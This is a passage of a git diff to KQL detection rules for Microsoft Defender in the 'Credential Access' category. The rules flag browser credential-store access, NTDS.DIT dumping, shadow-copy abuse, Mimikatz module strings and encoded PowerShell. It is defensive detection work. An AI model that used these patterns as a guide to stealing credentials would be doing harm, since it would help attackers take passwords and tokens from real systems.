+// False Positives: +// - Legitimate administrator working with shadow copies, access for backup purposes + +DeviceProcessEvents | where (ProcessCommandLine contains "shadow" and ProcessCommandLine contains "create") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql b/KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql index 77f36c3a..d706b07e 100644 --- a/KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql +++ b/KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql @@ -1,10 +1,10 @@ -// Title: SQLite Chromium Profile Data DB Access -// Author: TropChaud -// Date: 2022-12-19 -// Level: high -// Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1539, attack.t1555.003, attack.collection, attack.t1005 - -DeviceProcessEvents +// Title: SQLite Chromium Profile Data DB Access +// Author: TropChaud +// Date: 2022-12-19 +// Level: high +// Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1539, attack.t1555.003, attack.collection, attack.t1005 + +DeviceProcessEvents | where (ProcessCommandLine contains "\\User Data\\" or ProcessCommandLine contains "\\Opera Software\\" or ProcessCommandLine contains "\\ChromiumViewer\\") and (ProcessCommandLine contains "Login Data" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Web Data" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql b/KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql index 0bbedf19..2c1b05c3 100644 --- a/KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql +++ b/KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql @@ -1,10 +1,10 @@ -// Title: SQLite Firefox Profile Data DB Access -// Author: frack113 -// Date: 2022-04-08 -// Level: high -// Description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1539, attack.collection, attack.t1005 - -DeviceProcessEvents +// Title: SQLite Firefox Profile Data DB Access +// Author: frack113 +// Date: 2022-04-08 +// Level: high +// Description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1539, attack.collection, attack.t1005 + +DeviceProcessEvents | where (ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "places.sqlite") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql b/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql index 8933c2c7..d5163b72 100644 --- a/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql +++ b/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql @@ -1,16 +1,16 @@ -// Title: Suspicious File Access to Browser Credential Storage -// Author: frack113, X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems), Parth-FourCore -// Date: 2025-05-22 -// Level: low -// Description: Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts. -// Adversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies. -// This behavior is often commonly observed in credential stealing malware. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1555.003, attack.discovery, attack.t1217 -// False Positives: -// - Antivirus, Anti-Spyware, Anti-Malware Software -// - Legitimate software accessing browser data for synchronization or backup purposes. -// - Legitimate software installed on partitions other than "C:\" - -DeviceFileEvents +// Title: Suspicious File Access to Browser Credential Storage +// Author: frack113, X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems), Parth-FourCore +// Date: 2025-05-22 +// Level: low +// Description: Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts. +// Adversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies. +// This behavior is often commonly observed in credential stealing malware. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555.003, attack.discovery, attack.t1217 +// False Positives: +// - Antivirus, Anti-Spyware, Anti-Malware Software +// - Legitimate software accessing browser data for synchronization or backup purposes. +// - Legitimate software installed on partitions other than "C:\" + +DeviceFileEvents | where ((FileName contains "\\Sputnik\\Sputnik" or FileName contains "\\MapleStudio\\ChromePlus" or FileName contains "\\QIP Surf" or FileName contains "\\BlackHawk" or FileName contains "\\7Star\\7Star" or FileName contains "\\CatalinaGroup\\Citrio" or FileName contains "\\Google\\Chrome" or FileName contains "\\Coowon\\Coowon" or FileName contains "\\CocCoc\\Browser" or FileName contains "\\uCozMedia\\Uran" or FileName contains "\\Tencent\\QQBrowser" or FileName contains "\\Orbitum" or FileName contains "\\Slimjet" or FileName contains "\\Iridium" or FileName contains "\\Vivaldi" or FileName contains "\\Chromium" or FileName contains "\\GhostBrowser" or FileName contains "\\CentBrowser" or FileName contains "\\Xvast" or FileName contains "\\Chedot" or FileName contains "\\SuperBird" or FileName contains "\\360Browser\\Browser" or FileName contains "\\360Chrome\\Chrome" or FileName contains "\\Comodo\\Dragon" or FileName contains "\\BraveSoftware\\Brave-Browser" or FileName contains "\\Torch" or FileName contains "\\UCBrowser\\" or FileName contains "\\Blisk" or FileName contains "\\Epic Privacy Browser" or FileName contains "\\Nichrome" or FileName contains "\\Amigo" or FileName contains "\\Kometa" or FileName contains "\\Xpom" or FileName contains "\\Microsoft\\Edge" or FileName contains "\\Liebao7Default\\EncryptedStorage" or FileName contains "\\AVAST Software\\Browser" or FileName contains "\\Kinza" or FileName contains "\\Mozilla\\SeaMonkey\\" or FileName contains "\\Comodo\\IceDragon\\" or FileName contains "\\8pecxstudios\\Cyberfox\\" or FileName contains "\\FlashPeak\\SlimBrowser\\" or FileName contains "\\Moonchild Productions\\Pale Moon\\") and (FileName contains "\\Profiles\\" or FileName contains "\\User Data") and ((FileName contains "\\Login Data" or FileName contains "\\Cookies" or FileName contains "\\EncryptedStorage" or FileName contains "\\WebCache\\") or (FileName endswith "cert9.db" or FileName endswith "cookies.sqlite" or FileName endswith "formhistory.sqlite" or FileName endswith "key3.db" or FileName endswith "key4.db" or FileName endswith "Login Data.sqlite" or FileName endswith "logins.json" or FileName endswith "places.sqlite"))) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or (InitiatingProcessFolderPath endswith "\\Sputnik.exe" or InitiatingProcessFolderPath endswith "\\ChromePlus.exe" or InitiatingProcessFolderPath endswith "\\QIP Surf.exe" or InitiatingProcessFolderPath endswith "\\BlackHawk.exe" or InitiatingProcessFolderPath endswith "\\7Star.exe" or InitiatingProcessFolderPath endswith "\\Sleipnir5.exe" or InitiatingProcessFolderPath endswith "\\Citrio.exe" or InitiatingProcessFolderPath endswith "\\Chrome SxS.exe" or InitiatingProcessFolderPath endswith "\\Chrome.exe" or InitiatingProcessFolderPath endswith "\\Coowon.exe" or InitiatingProcessFolderPath endswith "\\CocCocBrowser.exe" or InitiatingProcessFolderPath endswith "\\Uran.exe" or InitiatingProcessFolderPath endswith "\\QQBrowser.exe" or InitiatingProcessFolderPath endswith "\\Orbitum.exe" or InitiatingProcessFolderPath endswith "\\Slimjet.exe" or InitiatingProcessFolderPath endswith "\\Iridium.exe" or InitiatingProcessFolderPath endswith "\\Vivaldi.exe" or InitiatingProcessFolderPath endswith "\\Chromium.exe" or InitiatingProcessFolderPath endswith "\\GhostBrowser.exe" or InitiatingProcessFolderPath endswith "\\CentBrowser.exe" or InitiatingProcessFolderPath endswith "\\Xvast.exe" or InitiatingProcessFolderPath endswith "\\Chedot.exe" or InitiatingProcessFolderPath endswith "\\SuperBird.exe" or InitiatingProcessFolderPath endswith "\\360Browser.exe" or InitiatingProcessFolderPath endswith "\\360Chrome.exe" or InitiatingProcessFolderPath endswith "\\dragon.exe" or InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\torch.exe" or InitiatingProcessFolderPath endswith "\\UCBrowser.exe" or InitiatingProcessFolderPath endswith "\\BliskBrowser.exe" or InitiatingProcessFolderPath endswith "\\Epic Privacy Browser.exe" or InitiatingProcessFolderPath endswith "\\nichrome.exe" or InitiatingProcessFolderPath endswith "\\AmigoBrowser.exe" or InitiatingProcessFolderPath endswith "\\KometaBrowser.exe" or InitiatingProcessFolderPath endswith "\\XpomBrowser.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\LiebaoBrowser.exe" or InitiatingProcessFolderPath endswith "\\AvastBrowser.exe" or InitiatingProcessFolderPath endswith "\\Kinza.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\icedragon.exe" or InitiatingProcessFolderPath endswith "\\cyberfox.exe" or InitiatingProcessFolderPath endswith "\\SlimBrowser.exe" or InitiatingProcessFolderPath endswith "\\palemoon.exe") or (InitiatingProcessFolderPath contains "\\Sputnik\\" or InitiatingProcessFolderPath contains "\\MapleStudio\\" or InitiatingProcessFolderPath contains "\\QIP Surf\\" or InitiatingProcessFolderPath contains "\\BlackHawk\\" or InitiatingProcessFolderPath contains "\\7Star\\" or InitiatingProcessFolderPath contains "\\Fenrir Inc\\" or InitiatingProcessFolderPath contains "\\CatalinaGroup\\" or InitiatingProcessFolderPath contains "\\Google\\" or InitiatingProcessFolderPath contains "\\Coowon\\" or InitiatingProcessFolderPath contains "\\CocCoc\\" or InitiatingProcessFolderPath contains "\\uCozMedia\\" or InitiatingProcessFolderPath contains "\\Tencent\\" or InitiatingProcessFolderPath contains "\\Orbitum\\" or InitiatingProcessFolderPath contains "\\Slimjet\\" or InitiatingProcessFolderPath contains "\\Iridium\\" or InitiatingProcessFolderPath contains "\\Vivaldi\\" or InitiatingProcessFolderPath contains "\\Chromium\\" or InitiatingProcessFolderPath contains "\\GhostBrowser\\" or InitiatingProcessFolderPath contains "\\CentBrowser\\" or InitiatingProcessFolderPath contains "\\Xvast\\" or InitiatingProcessFolderPath contains "\\Chedot\\" or InitiatingProcessFolderPath contains "\\SuperBird\\" or InitiatingProcessFolderPath contains "\\360Browser\\" or InitiatingProcessFolderPath contains "\\360Chrome\\" or InitiatingProcessFolderPath contains "\\Comodo\\" or InitiatingProcessFolderPath contains "\\BraveSoftware\\" or InitiatingProcessFolderPath contains "\\Torch\\" or InitiatingProcessFolderPath contains "\\UCBrowser\\" or InitiatingProcessFolderPath contains "\\Blisk\\" or InitiatingProcessFolderPath contains "\\Epic Privacy Browser\\" or InitiatingProcessFolderPath contains "\\Nichrome\\" or InitiatingProcessFolderPath contains "\\Amigo\\" or InitiatingProcessFolderPath contains "\\Kometa\\" or InitiatingProcessFolderPath contains "\\Xpom\\" or InitiatingProcessFolderPath contains "\\Microsoft\\" or InitiatingProcessFolderPath contains "\\Liebao7\\" or InitiatingProcessFolderPath contains "\\AVAST Software\\" or InitiatingProcessFolderPath contains "\\Kinza\\" or InitiatingProcessFolderPath contains "\\Mozilla\\" or InitiatingProcessFolderPath contains "\\8pecxstudios\\" or InitiatingProcessFolderPath contains "\\FlashPeak\\" or InitiatingProcessFolderPath contains "\\Moonchild Productions\\") or (InitiatingProcessFolderPath =~ "System" and InitiatingProcessParentFileName =~ "Idle")))) and (not(((InitiatingProcessFolderPath contains "\\Microsoft\\Windows Defender\\" and (InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe")) or InitiatingProcessParentFileName =~ "msiexec.exe" or InitiatingProcessFolderPath endswith "\\everything.exe" or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe")))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_history_file_operations.kql b/KQL/rules/Credential Access/suspicious_history_file_operations.kql index 73d5d226..a9250bc4 100644 --- a/KQL/rules/Credential Access/suspicious_history_file_operations.kql +++ b/KQL/rules/Credential Access/suspicious_history_file_operations.kql @@ -1,13 +1,13 @@ -// Title: Suspicious History File Operations -// Author: Mikhail Larin, oscd.community -// Date: 2020-10-17 -// Level: medium -// Description: Detects commandline operations on shell history files -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.003 -// False Positives: -// - Legitimate administrative activity -// - Legitimate software, cleaning hist file - -DeviceProcessEvents +// Title: Suspicious History File Operations +// Author: Mikhail Larin, oscd.community +// Date: 2020-10-17 +// Level: medium +// Description: Detects commandline operations on shell history files +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.003 +// False Positives: +// - Legitimate administrative activity +// - Legitimate software, cleaning hist file + +DeviceProcessEvents | where ProcessCommandLine contains ".bash_history" or ProcessCommandLine contains ".zsh_history" or ProcessCommandLine contains ".zhistory" or ProcessCommandLine contains ".history" or ProcessCommandLine contains ".sh_history" or ProcessCommandLine contains "fish_history" \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_key_manager_access.kql b/KQL/rules/Credential Access/suspicious_key_manager_access.kql index 7d436e24..d9bf2d8d 100644 --- a/KQL/rules/Credential Access/suspicious_key_manager_access.kql +++ b/KQL/rules/Credential Access/suspicious_key_manager_access.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Key Manager Access -// Author: Florian Roth (Nextron Systems) -// Date: 2022-04-21 -// Level: high -// Description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager) -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1555.004 -// False Positives: -// - Administrative activity - -DeviceProcessEvents +// Title: Suspicious Key Manager Access +// Author: Florian Roth (Nextron Systems) +// Date: 2022-04-21 +// Level: high +// Description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager) +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555.004 +// False Positives: +// - Administrative activity + +DeviceProcessEvents | where (ProcessCommandLine contains "keymgr" and ProcessCommandLine contains "KRShowKeyMgr") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql b/KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql index 565ac3f8..17947643 100644 --- a/KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql +++ b/KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Process Patterns NTDS.DIT Exfil -// Author: Florian Roth (Nextron Systems) -// Date: 2022-03-11 -// Level: high -// Description: Detects suspicious process patterns used in NTDS.DIT exfiltration -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.003 - -DeviceProcessEvents +// Title: Suspicious Process Patterns NTDS.DIT Exfil +// Author: Florian Roth (Nextron Systems) +// Date: 2022-03-11 +// Level: high +// Description: Detects suspicious process patterns used in NTDS.DIT exfiltration +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 + +DeviceProcessEvents | where ((ProcessCommandLine contains "ac i ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "/c copy " and ProcessCommandLine contains "\\windows\\ntds\\ntds.dit") or (ProcessCommandLine contains "activate instance ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "ntds.dit") or ((FolderPath endswith "\\NTDSDump.exe" or FolderPath endswith "\\NTDSDumpEx.exe") or (ProcessCommandLine contains "ntds.dit" and ProcessCommandLine contains "system.hiv") or ProcessCommandLine contains "NTDSgrab.ps1")) or (((InitiatingProcessFolderPath contains "\\apache" or InitiatingProcessFolderPath contains "\\tomcat" or InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\") or (FolderPath contains "\\apache" or FolderPath contains "\\tomcat" or FolderPath contains "\\AppData\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Public\\" or FolderPath contains "\\PerfLogs\\")) and ProcessCommandLine contains "ntds.dit") \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_reg_add_open_command.kql b/KQL/rules/Credential Access/suspicious_reg_add_open_command.kql index b4a69993..4903a241 100644 --- a/KQL/rules/Credential Access/suspicious_reg_add_open_command.kql +++ b/KQL/rules/Credential Access/suspicious_reg_add_open_command.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Reg Add Open Command -// Author: frack113 -// Date: 2021-12-20 -// Level: medium -// Description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003 - -DeviceProcessEvents +// Title: Suspicious Reg Add Open Command +// Author: frack113 +// Date: 2021-12-20 +// Level: medium +// Description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003 + +DeviceProcessEvents | where (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/ve " and ProcessCommandLine contains "/d") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "DelegateExecute") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings") \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql b/KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql index f7bbaceb..b074209f 100644 --- a/KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql +++ b/KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Serv-U Process Pattern -// Author: Florian Roth (Nextron Systems) -// Date: 2021-07-14 -// Level: high -// Description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1555, cve.2021-35211 -// False Positives: -// - Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution - -DeviceProcessEvents +// Title: Suspicious Serv-U Process Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2021-07-14 +// Level: high +// Description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555, cve.2021-35211 +// False Positives: +// - Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution + +DeviceProcessEvents | where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe") and InitiatingProcessFolderPath endswith "\\Serv-U.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_system_user_process_creation.kql b/KQL/rules/Credential Access/suspicious_system_user_process_creation.kql index f532a1dd..706dd2f1 100644 --- a/KQL/rules/Credential Access/suspicious_system_user_process_creation.kql +++ b/KQL/rules/Credential Access/suspicious_system_user_process_creation.kql @@ -1,14 +1,14 @@ -// Title: Suspicious SYSTEM User Process Creation -// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords) -// Date: 2021-12-20 -// Level: high -// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter) -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.defense-evasion, attack.privilege-escalation, attack.t1134, attack.t1003, attack.t1027 -// False Positives: -// - Administrative activity -// - Scripts and administrative tools used in the monitored environment -// - Monitoring activity - -DeviceProcessEvents +// Title: Suspicious SYSTEM User Process Creation +// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords) +// Date: 2021-12-20 +// Level: high +// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter) +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.defense-evasion, attack.privilege-escalation, attack.t1134, attack.t1003, attack.t1027 +// False Positives: +// - Administrative activity +// - Scripts and administrative tools used in the monitored environment +// - Monitoring activity + +DeviceProcessEvents | where (((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\wscript.exe") or ProcessCommandLine matches regex "net\\s+user\\s+" or (ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " -decode " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /urlcache " or ProcessCommandLine contains " -urlcache " or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " JAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SUVYI") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SQBFAFgA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aWV4I") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " IAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aQBlAHgA") or ProcessCommandLine contains "vssadmin delete shadows" or ProcessCommandLine contains "reg SAVE HKLM" or ProcessCommandLine contains " -ma " or ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "event::clear" or ProcessCommandLine contains "event::drop" or ProcessCommandLine contains "id::modify" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "misc::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "sid::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "vault::cred" or ProcessCommandLine contains "vault::list" or ProcessCommandLine contains " p::d " or ProcessCommandLine contains ";iex(" or ProcessCommandLine contains "MiniDump"))) and (not((InitiatingProcessFolderPath contains ":\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (ProcessCommandLine contains " -ma " and (FolderPath contains ":\\Program Files (x86)\\Java\\" or FolderPath contains ":\\Program Files\\Java\\") and FolderPath endswith "\\bin\\jp2launcher.exe" and (InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Java\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Java\\") and InitiatingProcessFolderPath endswith "\\bin\\javaws.exe") or (ProcessCommandLine contains "ping" and ProcessCommandLine contains "127.0.0.1" and ProcessCommandLine contains " -n ") or (FolderPath endswith "\\PING.EXE" and InitiatingProcessCommandLine contains "\\DismFoDInstall.cmd")))) \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_sysvol_domain_group_policy_access.kql b/KQL/rules/Credential Access/suspicious_sysvol_domain_group_policy_access.kql index a5a219a1..8b6a6c94 100644 --- a/KQL/rules/Credential Access/suspicious_sysvol_domain_group_policy_access.kql +++ b/KQL/rules/Credential Access/suspicious_sysvol_domain_group_policy_access.kql @@ -1,12 +1,12 @@ -// Title: Suspicious SYSVOL Domain Group Policy Access -// Author: Markus Neis, Jonhnathan Ribeiro, oscd.community -// Date: 2018-04-09 -// Level: medium -// Description: Detects Access to Domain Group Policies stored in SYSVOL -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.006 -// False Positives: -// - Administrative activity - -DeviceProcessEvents +// Title: Suspicious SYSVOL Domain Group Policy Access +// Author: Markus Neis, Jonhnathan Ribeiro, oscd.community +// Date: 2018-04-09 +// Level: medium +// Description: Detects Access to Domain Group Policies stored in SYSVOL +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.006 +// False Positives: +// - Administrative activity + +DeviceProcessEvents | where ProcessCommandLine contains "\\SYSVOL\\" and ProcessCommandLine contains "\\policies\\" \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql b/KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql index b745ddf8..d3577940 100644 --- a/KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql +++ b/KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Teams Application Related ObjectAcess Event -// Author: @SerkinValery -// Date: 2022-09-16 -// Level: high -// Description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1528 - -DeviceRegistryEvents +// Title: Suspicious Teams Application Related ObjectAcess Event +// Author: @SerkinValery +// Date: 2022-09-16 +// Level: high +// Description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1528 + +DeviceRegistryEvents | where (RegistryKey contains "\\Microsoft\\Teams\\Cookies" or RegistryKey contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\current\\Teams.exe")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql b/KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql index 5a63271a..d5947d9a 100644 --- a/KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql +++ b/KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql @@ -1,13 +1,13 @@ -// Title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-14 -// Level: medium -// Description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.003 -// False Positives: -// - Legitimate usage to restore snapshots -// - Legitimate admin activity - -DeviceProcessEvents +// Title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-14 +// Level: medium +// Description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 +// False Positives: +// - Legitimate usage to restore snapshots +// - Legitimate admin activity + +DeviceProcessEvents | where ((ProcessCommandLine contains "snapshot" and ProcessCommandLine contains "mount ") or (ProcessCommandLine contains "ac" and ProcessCommandLine contains " i" and ProcessCommandLine contains " ntds")) and (FolderPath endswith "\\ntdsutil.exe" or ProcessVersionInfoOriginalFileName =~ "ntdsutil.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql b/KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql index 0f3e9379..6da102e1 100644 --- a/KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql +++ b/KQL/rules/Credential Access/volumeshadowcopy_symlink_creation_via_mklink.kql @@ -1,12 +1,12 @@ -// Title: VolumeShadowCopy Symlink Creation Via Mklink -// Author: Teymur Kheirkhabarov, oscd.community -// Date: 2019-10-22 -// Level: high -// Description: Shadow Copies storage symbolic link creation using operating systems utilities -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003 -// False Positives: -// - Legitimate administrator working with shadow copies, access for backup purposes - -DeviceProcessEvents +// Title: VolumeShadowCopy Symlink Creation Via Mklink +// Author: Teymur Kheirkhabarov, oscd.community +// Date: 2019-10-22 +// Level: high +// Description: Shadow Copies storage symbolic link creation using operating systems utilities +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003 +// False Positives: +// - Legitimate administrator working with shadow copies, access for backup purposes + +DeviceProcessEvents | where ProcessCommandLine contains "mklink" and ProcessCommandLine contains "HarddiskVolumeShadowCopy" \ No newline at end of file diff --git a/KQL/rules/Credential Access/wce_wceaux_dll_access.kql 